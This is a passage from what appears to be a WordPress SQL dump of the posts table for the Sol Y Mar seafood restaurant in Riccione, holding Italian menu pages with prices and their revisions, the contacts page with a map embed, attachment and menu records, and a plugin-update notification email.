any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><h2>What rights you have over your data</h2><p>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><h2>Where we send your data</h2><p>Visitor comments may be checked through an automated spam detection service.</p><h2>Your contact information</h2><h2>Additional information</h2><h3>How we protect your data</h3><h3>What data breach procedures we have in place</h3><h3>What third parties we receive data from</h3><h3>What automated decision making and/or profiling we do with user data</h3><h3>Industry regulatory disclosure requirements</h3>','Privacy Policy','','draft','closed','open','','privacy-policy','','','2018-07-25 08:07:57','2018-07-25 08:07:57','',0,'http://attika.mikado-themes.com/?page_id=3',0,'page','',0),(5,1,'2015-07-29 14:56:29','2015-07-29 12:56:29','<em>   </em><em>Menù Degustazione </em>\r\n\r\n<em> </em>\r\n\r\n<em> ” Oggi”</em>\r\n\r\n<em>   </em><em>Entrée di Benvenuto</em>\r\n\r\n<em>  Degustazione di Antipasti (un crudo e due cotti)</em>\r\n\r\n<em>    La Pasta</em>\r\n\r\n<em>    Il Secondo</em>\r\n\r\n<em> Pre Dessert</em>\r\n\r\n<em> Il Dessert</em>\r\n\r\n<em>  € 50,oo cad *per tutto il tavolo (min due persone)</em>\r\n\r\n<em>  € 53,oo cad per una parte del tavolo (min due persone)</em>\r\n\r\n<em>  (bevande escluse)</em>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<em> “ come 23 anni fa “</em>\r\n\r\n<em> Tonno in“Porchetta” su crema di finocchio e olio alle erbe aromatiche</em>\r\n\r\n<em> I Gamberi alla Greca</em>\r\n\r\n<em> Spaghetto “Pastificio dei Campi “ alle Vongole</em>\r\n\r\n<em> Frittura mista e Spiedone grigliato</em>\r\n\r\n<em> Sorbetto al caffè</em>\r\n\r\n<em> € 44,oo cad.*per tutto il tavolo( min 2 persone)</em>\r\n\r\n<em> € 46,oo cad. per una parte del tavolo(min 2 pers)</em>\r\n\r\n<em> (bevande escluse )</em>\r\n\r\n<em> I due Menù non sono ordinabili contemporaneamente allo stesso tavolo</em>\r\n\r\n* eccezione di singoli ,bambini e vegetariani','Le 5 portate dello chef','','publish','closed','closed','','le-5-portate-dello-chef','','','2019-02-12 14:22:35','2019-02-12 13:22:35','',10,'http://www.ristorantesolymar.it/?page_id=5',8,'page','',0),(6,1,'2015-07-29 14:49:36','2015-07-29 12:49:36','','le 5 portate dello chef 2 15-06-15','','inherit','open','open','','le-5-portate-dello-chef-2-15-06-15','','','2015-07-29 14:49:36','2015-07-29 12:49:36','',5,'http://www.ristorantesolymar.it/wp-content/uploads/2015/07/le-5-portate-dello-chef-2-15-06-15.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(7,1,'2015-07-29 14:56:29','2015-07-29 12:56:29','[embeddoc url=\"http://www.ristorantesolymar.it/wp-content/uploads/2015/07/le-5-portate-dello-chef-2-15-06-15.docx\" viewer=\"microsoft\"]','Le 5 portate dello chef','','inherit','open','open','','5-revision-v1','','','2015-07-29 14:56:29','2015-07-29 12:56:29','',5,'http://www.ristorantesolymar.it/2015/07/29/5-revision-v1/',0,'revision','',0),(8,1,'2015-07-29 14:59:15','2015-07-29 12:59:15','<strong><em>Dall’ inizio alla fine</em></strong>\r\n\r\n<strong><em>                                           le nostre Proposte</em></strong><strong><em>          </em></strong>\r\n\r\n<em>                                                           </em><strong><em>“ Oggi  “</em></strong>\r\n\r\n<em>Un entrée di Benvenuto </em>\r\n\r\n<em>La Degustazione di antipasti</em>\r\n\r\n<em>(Un crudo e due cotti)</em>\r\n\r\n<em>La Pasta</em>\r\n\r\n<em>Il Secondo</em>\r\n\r\n<em>Pre Dessert</em>\r\n\r\n<em>Il  Dessert</em>\r\n\r\n<em>€ 48,00 cad *per tutto il tavolo min due persone</em>\r\n\r\n<em>                               </em><em>€ 53,00 cad per una parte del tavolo ”   “ “</em>\r\n\r\n<em>(bevande escluse)</em>\r\n\r\n<strong><em>                                                                                   ***</em></strong>\r\n\r\n<strong><em>                         “ come 20  anni fa   “</em></strong>\r\n\r\n<em>Calamari saltati con patate e bacon</em>\r\n\r\n<em>“Gamberi alla Greca”</em>\r\n\r\n<em>Spaghetto alle vongole</em>\r\n\r\n<em>Frittura mista e  Spiedone grigliato</em>\r\n\r\n<em>Sorbetto al caffè</em>\r\n\r\n<em>€ 43,00 cad.*per tutto il tavolo min 2 persone </em>\r\n\r\n<em>                                     € 46,00 cad. per una parte del tavolo” “ “</em>\r\n\r\n<em>(bevande escluse )</em>\r\n\r\n<em>non ordinabili contemporaneamente allo stesso tavolo</em>\r\n\r\n*Ad eccezioni di singoli ,bambini e vegetariani','Le 5 portate dello chef','','inherit','open','open','','5-revision-v1','','','2015-07-29 14:59:15','2015-07-29 12:59:15','',5,'http://www.ristorantesolymar.it/2015/07/29/5-revision-v1/',0,'revision','',0),(9,1,'2015-07-29 15:00:03','2015-07-29 13:00:03','<strong><em>Dall’ inizio alla fine </em></strong><strong><em>le nostre Proposte</em></strong><strong><em> </em></strong><strong style=\"line-height: 1.5;\"><em>“ Oggi  “</em></strong>\r\n\r\n<em>Un entrée di Benvenuto </em>\r\n\r\n<em>La Degustazione di antipasti</em>\r\n\r\n<em>(Un crudo e due cotti)</em>\r\n\r\n<em>La Pasta</em>\r\n\r\n<em>Il Secondo</em>\r\n\r\n<em>Pre Dessert</em>\r\n\r\n<em>Il  Dessert</em>\r\n\r\n<em>€ 48,00 cad *per tutto il tavolo min due persone</em>\r\n\r\n<em>                               </em><em>€ 53,00 cad per una parte del tavolo ”   “ “</em>\r\n\r\n<em>(bevande escluse)</em>\r\n\r\n<strong><em>                                                                                   ***</em></strong>\r\n\r\n<strong><em>                         “ come 20  anni fa   “</em></strong>\r\n\r\n<em>Calamari saltati con patate e bacon</em>\r\n\r\n<em>“Gamberi alla Greca”</em>\r\n\r\n<em>Spaghetto alle vongole</em>\r\n\r\n<em>Frittura mista e  Spiedone grigliato</em>\r\n\r\n<em>Sorbetto al caffè</em>\r\n\r\n<em>€ 43,00 cad.*per tutto il tavolo min 2 persone </em>\r\n\r\n<em>                                     € 46,00 cad. per una parte del tavolo” “ “</em>\r\n\r\n<em>(bevande escluse )</em>\r\n\r\n<em>non ordinabili contemporaneamente allo stesso tavolo</em>\r\n\r\n*Ad eccezioni di singoli ,bambini e vegetariani','Le 5 portate dello chef','','inherit','open','open','','5-revision-v1','','','2015-07-29 15:00:03','2015-07-29 13:00:03','',5,'http://www.ristorantesolymar.it/2015/07/29/5-revision-v1/',0,'revision','',0),(10,1,'2015-07-29 15:00:31','2015-07-29 13:00:31','[pagelist_ext child_of=\"current\" limit_content=\"200\"]','Menù','','publish','closed','open','','menu','','','2017-07-06 23:38:36','2017-07-06 21:38:36','',0,'http://www.ristorantesolymar.it/?page_id=10',0,'page','',0),(11,1,'2015-07-29 15:00:31','2015-07-29 13:00:31','','Menù','','inherit','open','open','','10-revision-v1','','','2015-07-29 15:00:31','2015-07-29 13:00:31','',10,'http://www.ristorantesolymar.it/2015/07/29/10-revision-v1/',0,'revision','',0),(12,1,'2015-07-29 15:18:11','2015-07-29 13:18:11','[pagelist_ext child_of=\"4\" image_width=\"50\" image_height=\"50\"].','Menù','','inherit','open','open','','10-revision-v1','','','2015-07-29 15:18:11','2015-07-29 13:18:11','',10,'http://www.ristorantesolymar.it/2015/07/29/10-revision-v1/',0,'revision','',0),(13,1,'2015-07-29 15:19:48','2015-07-29 13:19:48','[pagelist_ext child_of=\"4\"].','Menù','','inherit','open','open','','10-revision-v1','','','2015-07-29 15:19:48','2015-07-29 13:19:48','',10,'http://www.ristorantesolymar.it/2015/07/29/10-revision-v1/',0,'revision','',0),(14,1,'2015-07-29 15:30:18','2015-07-29 13:30:18','<em>Per i piccoli ospiti…</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Menù Spiderman &amp; Principesse”</em></strong>\r\n\r\n<em>Gnocchetti al Ragù o pomodoro </em>\r\n\r\n<em>Cotoletta con patate fritte</em>\r\n\r\n<em>Gelato € 20 </em>\r\n\r\n<strong><em>Menù “Capitan Uncino”</em></strong>\r\n\r\n<em>Gnocchetti di patate alle vongole</em>\r\n\r\n<em>Sogliola alla griglia patate fritte</em>\r\n\r\n<em>Gelato€ 22,00 </em>\r\n\r\n<strong><em>Menù “Peter Pan “</em></strong>\r\n\r\n<em>Tortellini alla panna o al ragù</em>\r\n\r\n<em>Bistecchina di entrecote con patate fritte</em>\r\n\r\n<em>Gelato€ 22,00 </em>\r\n\r\n<em>I menù sono acquistabili solo per i piccoli ospiti(non per gli adulti)</em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Alla carta</em></strong>\r\n\r\n<strong><em>Primi piatti</em></strong>\r\n\r\n<em>Gnocchi al pomodoro                                                                                                          € 9,oo</em>\r\n\r\n<em>Gnocchi al ragù                                                                                                                    € 10,oo</em>\r\n\r\n<em>Gnocchi alle vongole                                                                                                           € 11,oo</em>\r\n\r\n<em>Spaghetti alle vongole                                                                                                        €13,oo</em>\r\n\r\n<em>Tortellini alla panna                                                                                                          € 10,oo</em>\r\n\r\n<em>Tortellini al ragù                                                                                                                 € 10,oo</em>\r\n\r\n<strong><em>Secondi piatti</em></strong>\r\n\r\n<em>Cotoletta con patate fritte                                                                                                 € 13,oo</em>\r\n\r\n<em>Sogliola alla griglia con patate fritte                                                                             € 14,00</em>\r\n\r\n<em>Bistecchina di entrcote con patate fritte                                                                       € 14,00</em>\r\n\r\n<em>Carote a filino                                                                                                                     € 4,00</em>\r\n\r\n<em>Coperto bimbi                                                                                                                     € 2,oo</em>\r\n\r\n<em> </em>','Menù Bambini','','publish','closed','open','','menu-bambini','','','2019-02-12 14:09:53','2019-02-12 13:09:53','',10,'http://www.ristorantesolymar.it/?page_id=14',0,'page','',0),(15,1,'2015-07-29 15:30:18','2015-07-29 13:30:18','<em>Per i piccoli ospiti</em><em>… e solo per loro</em>\r\n\r\n<strong><em>Il menù di Spiderman</em></strong>\r\n\r\n<em>Gnocchetti di patate al pomodoro o ragù</em>\r\n\r\n<em>Cotoletta</em>\r\n\r\n<em>Patatine fritte</em>\r\n\r\n<em>Gelato</em>\r\n\r\n<em>€ 20,00  escluso bevande</em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Il menù di Capitan Uncino</em></strong>\r\n\r\n<em>Gnocchetti di patate alle vongole</em>\r\n\r\n<em>Sogliola alla griglia</em>\r\n\r\n<em>Patate fritte</em>\r\n\r\n<em>Gelato</em>\r\n\r\n<em>€ 22,00  escluso bevande</em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Il menù di Shrek</em></strong>\r\n\r\n<em>Tortellini alla panna o al ragù</em>\r\n\r\n<em>Hamburger di manzo e pollo</em>\r\n\r\n<em>Con patate fritte</em>\r\n\r\n<em>Gelato</em>\r\n\r\n<em>€ 22,00  escluso bevande</em>\r\n\r\n<strong><em>Alla carta</em></strong>\r\n\r\n<strong><em>Primi piatti</em></strong>\r\n\r\n<em>Gnocchi al pomodoro                                                                                           € 9,00</em>\r\n\r\n<em>Gnocchi al ragù                                                                                                    € 10,00</em>\r\n\r\n<em>Gnocchi alle vongole                                                                                           € 12,00</em>\r\n\r\n<em>Spaghetti alle vongole                                                                                         €13,00</em>\r\n\r\n<em>Tortellini alla panna                                                                                            € 10,00</em>\r\n\r\n<em>Tortellini al ragù                                                                                                   € 10,00</em>\r\n\r\n<strong><em>Secondi piatti</em></strong>\r\n\r\n<em>Cotoletta con patate fritte                                                                                   € 13,00</em>\r\n\r\n<em>Sogliola alla griglia con patate fritte                                                                € 13,00</em>\r\n\r\n<em>Hamburger di manzo e pollo con carote a filini                                                          € 12,00</em>\r\n\r\n<em>Hamburger di manzo e pollo con patate fritte                                                 € 12,50</em>\r\n\r\n<em>Coperto                                                                                                                   € 2,00</em>\r\n\r\n<em> </em>','Menù Bambini','','inherit','open','open','','14-revision-v1','','','2015-07-29 15:30:18','2015-07-29 13:30:18','',14,'http://www.ristorantesolymar.it/2015/07/29/14-revision-v1/',0,'revision','',0),(17,1,'2015-07-29 15:33:17','2015-07-29 13:33:17',' ','','','publish','open','closed','','17','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'http://www.ristorantesolymar.it/?p=17',5,'nav_menu_item','',0),(18,1,'2015-07-29 15:33:17','2015-07-29 13:33:17',' ','','','publish','open','closed','','18','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=18',11,'nav_menu_item','',0),(19,1,'2015-07-29 15:33:17','2015-07-29 13:33:17',' ','','','publish','open','closed','','19','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',10,'http://www.ristorantesolymar.it/?p=19',12,'nav_menu_item','',0),(22,1,'2015-07-29 15:46:36','2015-07-29 13:46:36','[pagelist_ext child_of=\"current\" limit_content=\"200\"]','Carta dei Vini','','publish','closed','closed','','carta-dei-vini','','','2020-09-26 21:13:04','2020-09-26 19:13:04','',0,'http://www.ristorantesolymar.it/?page_id=22',0,'page','',0),(23,1,'2015-07-29 15:46:36','2015-07-29 13:46:36','','Carta dei Vini','','inherit','open','open','','22-revision-v1','','','2015-07-29 15:46:36','2015-07-29 13:46:36','',22,'http://www.ristorantesolymar.it/2015/07/29/22-revision-v1/',0,'revision','',0),(24,1,'2015-07-29 15:49:37','2015-07-29 13:49:37','[pagelist_ext child_of=\"4\"]','Menù','','inherit','open','open','','10-revision-v1','','','2015-07-29 15:49:37','2015-07-29 13:49:37','',10,'http://www.ristorantesolymar.it/2015/07/29/10-revision-v1/',0,'revision','',0),(25,1,'2015-07-29 15:49:44','2015-07-29 13:49:44','[pagelist_ext child_of=\"4\"]','Carta dei Vini','','inherit','open','open','','22-revision-v1','','','2015-07-29 15:49:44','2015-07-29 13:49:44','',22,'http://www.ristorantesolymar.it/2015/07/29/22-revision-v1/',0,'revision','',0),(28,1,'2015-07-29 20:23:02','2015-07-29 18:23:02','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528 (oppure 327 1935770 in caso di malfuzionamento linea)\r\nOrari: 12:30–14:00, 19:30–22:00\r\nEmail: info @ ristorantesolymar . it , oppure puoi utilizzare il modulo a fondo pagina\r\nGiorno di chiusura lunedì. Sono previste alcune eccezioni in caso di gruppi numerosi, fiere, festività o periodo determinati. Si consiglia sempre di telefonare prima.\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\" rel=\"noopener noreferrer\">Baltazar</a> e tante altre guide online.','Contatti','','publish','closed','open','','contatti','','','2020-11-11 12:16:15','2020-11-11 11:16:15','',0,'http://www.ristorantesolymar.it/?page_id=28',0,'page','',0),(29,1,'2015-07-29 20:23:02','2015-07-29 18:23:02','Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia.\r\nIndirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528\r\nOrari: 12:30–14:00, 19:30–22:00','Contatti','','inherit','open','open','','28-revision-v1','','','2015-07-29 20:23:02','2015-07-29 18:23:02','',28,'http://www.ristorantesolymar.it/2015/07/29/28-revision-v1/',0,'revision','',0),(30,1,'2015-07-29 20:34:50','2015-07-29 18:34:50','Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia.\r\nIndirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528\r\nOrari: 12:30–14:00, 19:30–22:00\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>','Contatti','','inherit','open','open','','28-revision-v1','','','2015-07-29 20:34:50','2015-07-29 18:34:50','',28,'http://www.ristorantesolymar.it/2015/07/29/28-revision-v1/',0,'revision','',0),(31,1,'2015-07-29 20:36:47','2015-07-29 18:36:47','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528\r\nOrari: 12:30–14:00, 19:30–22:00\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>','Contatti','','inherit','open','open','','28-revision-v1','','','2015-07-29 20:36:47','2015-07-29 18:36:47','',28,'http://www.ristorantesolymar.it/2015/07/29/28-revision-v1/',0,'revision','',0),(3698,0,'2021-01-06 01:23:01','2021-01-06 00:23:01','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.45 to 1.16.46)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-18','','','2021-01-06 01:23:01','2021-01-06 00:23:01','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-18/',0,'postman_sent_mail','',0),(36,2,'2015-07-29 21:00:27','2015-07-29 19:00:27','Acquista il tuo pranzo o la tua cena online: il Sol Y Mar ti propone questi menù per 2 persone. Scegli il tuo menù, compila i campi e concludi l\'acquisto del buono. Se invece vuoi regalare un buono a qualcuno, allora vai alla sezione <a href=\"http://www.ristorantesolymar.it/regala-cena/\">\"regala cena\"</a>\r\n\r\n[product_category category=\"acquista-cena\"]','Acquista Cena','','publish','closed','closed','','acquista-cena','','','2020-09-26 21:18:42','2020-09-26 19:18:42','',0,'http://www.ristorantesolymar.it/?page_id=36',0,'page','',0),(37,1,'2015-07-29 21:00:27','2015-07-29 19:00:27','<h2>Menu\' Creativo per 2 persone</h2>\r\n<p>Benvenuto della cucina<br />\r\nDegustazione di antipasti<br />\r\nUn crudo e due cotti<br />\r\nLa pasta<br />\r\nIl pesce<br />\r\nDessert<br />\r\nEuro 98,00 (Escluso Bavande)</p>\r\n\r\n<h2>Menu\' creativo per 2 persone + bere</h2> \r\n<p>\r\nMenu\' creativo + 1 bottiglia di vino + 2 caffe\' + 1 bottiglia d\'acqua<br />Euro 120\r\n</p>\r\n</td>\r\n<td width=\"10%\">\r\n<td width=\"45%\">\r\n<h2>Menu\' Storico per 2 persone</h2>\r\n<p>Calamari saltati con patate e bacon<br />\r\nGamberi alla greca<br />\r\nSpaghetto alle vongole<br />\r\nFrittura mista e lo spiedone grigliato<br />\r\nSorbetto<br />\r\nEuro 90,00 (Escluso Bavande)</p> \r\n\r\n<h2>Menu\' storico per 2 persone + bere</h2>\r\n<p>Menu\' storico per due persone con 1 bottiglia di vino 2 caffè e una bottiglia d\'acqua<br />Euro 115</p> \r\n\r\n\r\n</td>\r\n</tr>\r\n</table>\r\n','Acquista Cena','','inherit','open','open','','36-revision-v1','','','2015-07-29 21:00:27','2015-07-29 19:00:27','',36,'http://www.ristorantesolymar.it/2015/07/29/36-revision-v1/',0,'revision','',0),(38,1,'2015-07-29 21:02:09','2015-07-29 19:02:09','','logo2','','inherit','open','open','','logo2','','','2015-07-29 21:02:09','2015-07-29 19:02:09','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/07/logo2.png',0,'attachment','image/png',0),(40,1,'2015-07-29 21:10:39','2015-07-29 19:10:39','','foto_cucina','','inherit','open','open','','foto_cucina','','','2015-07-29 21:10:39','2015-07-29 19:10:39','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2015/07/foto_cucina.jpg',0,'attachment','image/jpeg',0),(205,1,'2018-07-31 09:52:26','2018-07-31 09:52:26','','h1-img-8a','','inherit','open','closed','','h1-img-8a','','','2018-07-31 09:52:26','2018-07-31 09:52:26','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-8a.jpg',0,'attachment','image/jpeg',0),(43,1,'2015-07-29 21:14:02','2015-07-29 19:14:02',' ','','','publish','open','closed','','43','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'http://www.ristorantesolymar.it/?p=43',1,'nav_menu_item','',0),(4297,1,'2018-08-08 12:34:37','2018-08-08 12:34:37','','kitchen-right-img-1','','inherit','open','closed','','kitchen-right-img-1','','','2018-08-08 12:34:37','2018-08-08 12:34:37','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-right-img-1.jpg',0,'attachment','image/jpeg',0),(45,1,'2015-07-29 21:14:02','2015-07-29 19:14:02',' ','','','publish','open','closed','','45','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'http://www.ristorantesolymar.it/?p=45',13,'nav_menu_item','',0),(4298,1,'2018-07-30 13:16:16','2018-07-30 13:16:16','','shop-img-11','','inherit','open','closed','','shop-img-11','','','2018-07-30 13:16:16','2018-07-30 13:16:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-11.jpg',0,'attachment','image/jpeg',0),(47,1,'2015-07-29 21:27:51','2015-07-29 19:27:51','<strong><em>Antipasti Crudi</em></strong>\r\n\r\n<em> </em><em>Tartara di Tonno rosso con crema di melanzane, pomodori arrostiti,  squacquerone e granella di pistacchi</em>\r\n\r\n<em>€ 15,0o </em>\r\n\r\n<em>Sashimi di Sgombro nostrano marinato, con \"Tzatziki\" di kefir, cetrioli, gel di limone cotto a bassa temperatura e menta</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em><em>Scampi nostrani crudi                                                    € 10,00 all\'etto (min. 2 etti)</em>\r\n\r\n<em>Tavolozza di crudi                                                            € 20,00</em>\r\n\r\n<em>Le ostriche del giorno (min.3)</em>\r\n\r\nDegustazione di ostriche (6 ostriche)                            <em>€ 22,00</em>\r\n\r\n&nbsp;\r\n\r\n<strong><em>Antipasti Freddi</em></strong>\r\n\r\nTagliatelle di Seppia, cotte a bassa temperatura,\"allo scoglio\" con frutti di mare e crostacei\r\n\r\n(servita a temperatura ambiente)\r\n\r\n<em>€ 14,00</em>\r\n\r\n&nbsp;\r\n\r\n<em><strong>Antipasti Caldi</strong></em>\r\n\r\n<em>Piadine fritte ripiene di Sardoncini grigliati, radicchio rosso , cipolla di tropea e squacquerone</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em>Fiori di zucca al forno, ripieni di Gamberi e mozzarella di bufala</em>\r\n\r\n<em>€14,00</em>\r\n\r\n<em>I gamberi alla greca (dal 1994, DIFFIDATE dalle imitazioni!)</em>\r\n\r\n<em>con pomodoro fresco e formaggio fuso</em>\r\n\r\n<em>€ 15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>  </em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n<em>In questo ristorante possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare, anche in questo caso, sempre</em> <em>la qualità migliore</em>','Antipasti Cotti','','publish','closed','open','','antipasti-cotti','','','2020-07-21 12:17:30','2020-07-21 10:17:30','',10,'http://www.ristorantesolymar.it/?page_id=47',1,'page','',0),(48,1,'2015-07-29 21:27:51','2015-07-29 19:27:51','<em>E il cotto…</em>\r\n\r\n<em>Piccola degustazione di antipasti, un crudo e due cotti (secondo mercato)</em>\r\n\r\n<em>(min 2 porz.)</em>\r\n\r\n<em>€ 19,oo cad.</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tagliatelle di Seppia cotta a bassa temperatura con maionese di Ricci di mare</em>\r\n\r\n<em>e salsa alla scarola</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Fiori di zucca ai gamberi e ricotta su passatina di pomodoro fresco e pinoli</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Insalatina tiepida di sogliola, pomodoro verde sedano e lime</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Piadine fritte con sardoncini grigliati, tropea e squaquerone</em>\r\n\r\n<em>€ 11,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>…e son vent’anni</em>\r\n\r\n<em>L’ antipasto misto freddo ( secondo il mercato)</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Calamaro saltato con patate arrostite e bacon</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Gamberi alla greca con pomodoro fresco e formaggio fuso</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>…per chi non mangia pesce</em>\r\n\r\n<em> </em>\r\n\r\n<em>Pinzimonio di verdure </em><em>(vegano)</em>\r\n\r\n<em>€ 7,oo</em>\r\n\r\n<em>Insalatina aromatica alla frutta </em><em>(vegano)</em>\r\n\r\n<em>€ 9,00</em>\r\n\r\n<em>Julienne di zucchine marinate con i pinoli </em><em>(vegano)</em>\r\n\r\n<em>€ 8,oo</em>\r\n\r\n<em>Parmigiana di melanzane</em>\r\n\r\n<em>€ 10,0o</em>\r\n\r\n<em>in  questo ristorante  possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>','Antipasti Cotti','','inherit','open','open','','47-revision-v1','','','2015-07-29 21:27:51','2015-07-29 19:27:51','',47,'http://www.ristorantesolymar.it/2015/07/29/47-revision-v1/',0,'revision','',0),(49,1,'2015-07-29 21:29:23','2015-07-29 19:29:23','<em>Il Crudo</em>\r\n\r\n<em>Il Gran Crudo</em>\r\n\r\n<em>3 ostriche 3 sashimi 3 tipi di crostacei   </em>\r\n\r\n<em>€ 